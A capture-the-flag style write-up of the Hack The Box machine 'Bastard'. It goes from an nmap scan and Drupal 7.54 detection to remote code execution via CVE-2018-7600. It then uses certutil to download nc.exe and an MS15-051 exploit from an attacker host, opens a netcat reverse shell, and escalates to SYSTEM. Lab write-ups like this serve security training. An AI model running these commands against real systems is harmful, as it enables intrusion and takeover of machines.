Bastard - Medium
OSCP Prep Box
Introduction@Bastard:~$
Enumeration
Nmap
# Nmap 7.92 scan initiated Thu Dec 30 10:54:46 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.32s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 10:56:36 2021 -- 1 IP address (1 host up) scanned in 110.02 secondsOnly three ports were opened.
Web
Port 80 is running Drupal CMS. We should know that drupal has a lot of vulnerabilities and first we need to know what version of this to find the exploit. We can look up drupal version at CHANGELOG.txt
┌─[sheinn101@parrot]─[~/htb/oscp/bastard]
└──╼ [??]$ curl -s http://10.10.10.9/CHANGELOG.txt | head
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
(API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
We can see that drupal is running at version 7.54 .
Finding Exploit
There is a lot of exploits and I chose python script. So we can easily run it.
┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "whoami"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-qYJ2NwZrrbby9Ni3lcPLtZgfUQqAbCtJcoQ6w_l2zug
[*] Triggering exploit to execute: whoami
nt authority\iusr
We can look up OS architecture with this command.
┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "wmic OS get OSArchitecture"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-6RIAIGKgoCtEq8pfK9I4voh1u6KpPFch5bnbDCVwEeg
[*] Triggering exploit to execute: wmic OS get OSArchitecture
OSArchitecture
64-bitThis is 64 bit machine .Now let try to get reverse shell.
Getting Reverse Shell
┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-RhKepY9VqzbvkjVKZKOQ19DNKXfJ5BhSuBYWEz6irE4
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe
**** Online ****
0000 ...
6e00
CertUtil: -URLCache command completed successfully.First I upload nc.exe to the victim machine.
python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.7 443 -e cmd.exe"Directory of c:\Users\dimitris\Desktop
19/03/2017 08:04 <DIR> .
19/03/2017 08:04 <DIR> ..
19/03/2017 08:06 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 30.808.027.136 bytes free
type user.txt
type user.txt
ba22fde1932d*******3d312f921a2
c:\Users\dimitris\Desktop>
Privilege Escalation
systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 3/1/2022, 6:17:36
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use: 489 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Run exploit suggester (didn't show in here) and you will see there is a couple of exploit and I chose this ms15051x64.exe.
Download and transfer to the victim machine like above.
c:\inetpub\drupal-7.54>
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"
**** Online ****
0000 ...
d800
CertUtil: -URLCache command completed successfully.
dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of c:\inetpub\drupal-7.54
03/01/2022 07:41 <DIR> .
03/01/2022 07:41 <DIR> ..
19/03/2017 12:42 317 .editorconfig
19/03/2017 12:42 174 .gitignore
19/03/2017 12:42 5.969 .htaccess
19/03/2017 12:42 6.604 authorize.php
19/03/2017 12:42 110.781 CHANGELOG.txt
19/03/2017 12:42 1.481 COPYRIGHT.txt
19/03/2017 12:42 720 cron.php
19/03/2017 12:43 <DIR> includes
19/03/2017 12:42 529 index.php
19/03/2017 12:42 1.717 INSTALL.mysql.txt
19/03/2017 12:42 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 703 install.php
19/03/2017 12:42 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 17.995 INSTALL.txt
19/03/2017 12:42 18.092 LICENSE.txt
19/03/2017 12:42 8.710 MAINTAINERS.txt
19/03/2017 12:43 <DIR> misc
19/03/2017 12:43 <DIR> modules
03/01/2022 07:41 55.296 ms15-051x64.exe
03/01/2022 06:48 28.160 nc.exe
19/03/2017 12:43 <DIR> profiles
ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1748 created.
==============================
nt authority\systemWe can execute the command as a system. Now we should try to get system shell.
cd c:\users\administrator\desktop
dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of c:\Users\Administrator\Desktop
19/03/2017 07:33 <DIR> .
19/03/2017 07:33 <DIR> ..
19/03/2017 07:34 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.965.696 bytes free
type root.txt.txt
type root.txt.txt
4bf12b963d********6f617f7ba7c
c:\Users\Administrator\Desktop>Reference
Last updated
